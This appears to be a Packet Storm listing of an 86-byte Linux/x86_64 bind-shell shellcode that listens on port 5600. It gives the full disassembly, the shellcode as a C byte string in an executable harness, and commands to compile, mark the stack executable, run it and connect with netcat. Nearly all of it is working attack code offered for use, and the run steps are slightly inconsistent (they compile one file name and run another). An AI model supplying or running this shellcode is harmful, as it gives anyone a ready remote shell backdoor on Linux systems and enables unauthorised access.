86 bytes small Linux/x86_64 bindshell shellcode that binds to port 5600.
f415d1d03a37b33543e9ec01d985ee645f372c6796387430d18867f67f06632f/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 f6 xor %rsi,%rsi
400086: 99 cltd
400087: 6a 29 pushq $0x29
400089: 58 pop %rax
40008a: ff c6 inc %esi
40008c: 6a 02 pushq $0x2
40008e: 5f pop %rdi
40008f: 0f 05 syscall
400091: 48 97 xchg %rax,%rdi
400093: 6a 02 pushq $0x2
400095: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp)
40009c: 54 push %rsp
40009d: 5e pop %rsi
40009e: 52 push %rdx
40009f: 6a 10 pushq $0x10
4000a1: 5a pop %rdx
4000a2: 6a 31 pushq $0x31
4000a4: 58 pop %rax
4000a5: 0f 05 syscall
4000a7: 50 push %rax
4000a8: 5e pop %rsi
4000a9: 6a 32 pushq $0x32
4000ab: 58 pop %rax
4000ac: 0f 05 syscall
4000ae: 6a 2b pushq $0x2b
4000b0: 58 pop %rax
4000b1: 0f 05 syscall
4000b3: 48 97 xchg %rax,%rdi
4000b5: 6a 03 pushq $0x3
4000b7: 5e pop %rsi
4000b8: ff ce dec %esi
4000ba: b0 21 mov $0x21,%al
4000bc: 0f 05 syscall
4000be: 75 f8 jne 0x4000b8
4000c0: 48 31 c0 xor %rax,%rax
4000c3: 99 cltd
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
4000cb: 2f 73 68
4000ce: 53 push %rbx
4000cf: 54 push %rsp
4000d0: 5f pop %rdi
4000d1: 6a 3b pushq $0x3b
4000d3: 58 pop %rax
4000d4: 0f 05 syscall
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell
How to Connect
$ nc <HOST IP ADDRESS> 5600
Eg:
$ nc 127.0.0.1 5600
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed